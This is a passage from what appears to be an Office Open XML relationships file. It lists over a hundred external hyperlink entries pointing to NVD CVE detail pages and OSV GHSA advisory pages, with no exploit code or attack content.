Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69771" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69792" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72931" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69381" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78971" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0001" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69713" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28627" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45527" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53638" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79588" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79603" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86736" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86853" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86994" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86995" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12285" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80159" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49895" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75726" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0054" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28582" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28622" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28623" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28630" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28638" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28660" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28671" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45519" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45521" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45525" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55290" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86564" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28652" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48707" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86670" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82710" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86512" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86514" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86515" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86518" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86668" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86675" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16003" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86644" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86667" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9215" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9216" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45219" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45220" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49153" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49154" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49155" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49156" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70613" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70614" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7809" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82514" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86477" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 